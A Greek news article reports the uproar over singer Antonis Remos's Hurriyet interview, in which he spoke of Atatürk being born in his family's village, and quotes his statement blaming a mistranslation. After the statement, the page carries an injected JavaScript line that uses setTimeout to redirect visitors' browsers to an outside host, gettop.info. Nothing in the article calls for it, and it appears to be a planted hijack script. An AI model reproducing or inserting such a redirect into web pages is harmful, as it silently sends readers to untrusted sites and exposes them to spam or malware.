Σάλος από δηλώσεις Ρέμου: Υπερήφανος γιατί στο χωριό μου γεννήθηκε ο Κεμάλ

0
28

 

Συνέντευξη στην τουρκική εφημερίδα Hurriyet έδωσε ο Έλληνας τραγουδιστής Αντώνης Ρέμος και με τις δηλώσεις που έκανε ήδη συζητείται έντονα.

Ο γνωστός καλλιτέχνης βρέθηκε στην Αλικαρνασσό όπως κάνει κάθε χρόνο ενώ δεν δίστασε να τραγουδήσει μαζί με τον δημοσιογράφο Σαβάς Οζμπέι που του πήρε τη συνέντευξη το «Μαβί Μαβί» του Ιμπραήμ Τατλισές.

Όταν ο Αντώνης Ρέμος αποκάλυψε στον δημοσιογράφο πως προέρχεται από το ίδιο χωριό με τον Ατατούρκ, ο Οζμπέι θέλησε να μάθει περισσότερα, όπως γράφει η «Εspresso».

«Δεν είμαι μόνο συμπολίτης, αλλά και συγχωριανός του. Οπως ξέρετε, στην πόλη (σ.σ.: Θεσσαλονίκη) υπάρχει το σπίτι όπου μεγάλωσε ο Ατατούρκ. Υπάρχει όμως και το σπίτι στο οποίο γεννήθηκε, σε ένα χωριό έξω από τη Θεσσαλονίκη, τον Λαγκαδά. Από εκεί είναι η οικογένειά μου. Είμαστε περήφανοι που στο χωριό μας γεννήθηκε ένας από τους μεγαλύτερους παγκόσμιους ηγέτες» υποστήριξε ο Αντώνης Ρέμος, ο οποίος τόνισε πως Ελληνες και Τούρκοι έχουν αρκετά κοινά σημεία αναφοράς. «Πρέπει να διαφυλάξουμε αυτή την κληρονομιά και τις κοινές αναμνήσεις που μας ενώνουν με τον τουρκικό λαό. Οχι μόνο οι Τούρκοι, αλλά και εμείς. Γιατί δεν καταλαβαίνουμε πόσο σημαντικό είναι -και- για εμάς;»

Ο Τούρκος δημοσιογράφος, σημείωσε πως ο Γιάννης Μπουτάρης φαίνεται να καταλαβαίνει τη σημασία της ανάδειξης της οικίας του Κεμάλ στη Θεσσαλονίκη, με τον Αντώνη Ρέμο να παίρνει θέση:

«Ο δήμαρχος είναι επιχειρηματίας, βλέπει μπροστά και αγαπά πραγματικά την πόλη του. Και καταλαβαίνει ότι το μνημείο αυτό δεν είναι σημαντικό μόνο για τους Τούρκους, αλλά και για εμάς».

Ο Ελληνας καλλιτέχνης, οι εμφανίσεις του οποίου, όπως σημειώνεται στο ρεπορτάζ, σε Αμερική, Αυστραλία ή όπου αλλού τραγουδάει είναι sold out, μίλησε για το Αϊβαλί, τον τόπο απ’ όπου προέρχεται η οικογένεια Πασχαλίδη.

«H οικογένειά μου ήρθε από το Αϊβαλί. Το αίμα μου είναι από αυτά τα χώματα, αυτά τα μέρη. Μοιάζετε με μένα, η συμπεριφορά σας είναι σαν τη δική μου, το χαμόγελό σας είναι σαν το χαμόγελό μου, θυμώνετε όπως και εγώ» επισήμανε, ενώ σε ερώτηση σχετικά με την ανταλλαγή πληθυσμών μεταξύ Ελλάδας και Τουρκίας (όταν οι Ελληνες πρόσφυγες αποκαλούνταν Τουρκόσποροι και οι Τούρκοι που επέστρεψαν στη χώρα τους Γκιαούρηδες) ο τραγουδιστής είπε: «Μην κοιτάτε τι έγινε πριν από 100 χρόνια. Αν εστιάσεις εκεί, θα πρέπει να εστιάσεις και στα 400 χρόνια πίσω, και δεν τελειώνει ποτέ αυτό. Πρέπει να δούμε το σήμερα. Οι Ελληνες ανακάλυψαν τη δημοκρατία σ’ αυτόν τον τόπο που απολαμβάνουμε καθημερινά. Ομως, σήμερα, μόνο η Ελλάδα δεν έχει δημοκρατία».

Μετά τον σάλο που προκλήθηκε από τις δηλώσεις αυτές σχετικά με την καταγωγή του και τον Κεμάλ Ατατούρκ ο Αντώνης Ρέμος, εξέδωσε ανακοίνωση όπου τονίζει πως δεν έχει να απολογηθεί σε κανέναν και ότι μένει έκπληκτος με αυτά που διαβάζει, καθώς θεωρεί ότι έχει γίνει λάθος στη μετάφραση.

Αναλυτικά, αναφέρει:

«Πριν από λίγο καιρό βρέθηκα στην Τουρκία και συγκεκριμένα στο Bodrum καλεσμένος μιας μεγάλης εταιρία για να δώσω δύο συναυλίες εκεί. Τα ΜΜΕ έδειξαν μεγάλο ενδιαφέρον και έδωσα κάποιες συνεντεύξεις. Διαβάζω σήμερα την ερμηνεία και την παρουσίαση μιας εκ των συνεντεύξεων μου. Μένω έκπληκτος με αυτά που διαβάζω και πιστεύω ότι ή έχει γίνει λάθος μετάφραση από τα Τούρκικα στα Ελληνικά, ή τα τούρκικα μέσα παρουσίασαν με λανθασμένο τρόπο τα λεγόμενά μου.

Περήφανος είμαι μόνο για την καταγωγή μου που είμαι Έλληνας. Από εκεί και πέρα, έξω από τα πολιτικά παιχνίδια και τις ιστορικές αντιπαλότητες των δύο λαών, οι απλοί άνθρωποι και οι Έλληνες και οι Τούρκοι πραγματικά δεν έχουν να χωρίσουν πια τίποτα. Υπάρχει μεγάλη εκτίμηση και αγάπη των απλών ανθρώπων και από τις δύο πλευρές και είμαι σίγουρος γι’ αυτό. Όσον αφορά στο θέμα των δηλώσεών μου για τον Κεμάλ, η αλήθεια είναι ότι είπα, πως είμαι περήφανος που κατάγομαι από την Θεσσαλονίκη και στην ίδια συζήτηση αναφέρθηκε η καταγωγή του Κεμάλ από την Θεσσαλονίκη και προφανώς τοποθετήθηκαν όλα μαζί. Κλείνοντας δεν έχω διάθεση να απολογηθώ σε κανέναν, από εκεί και πέρα ο καθένας είναι ελεύθερος να βγάλει τα συμπεράσματά του. Σας ευχαριστώ όλους. Καλημέρα.»

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here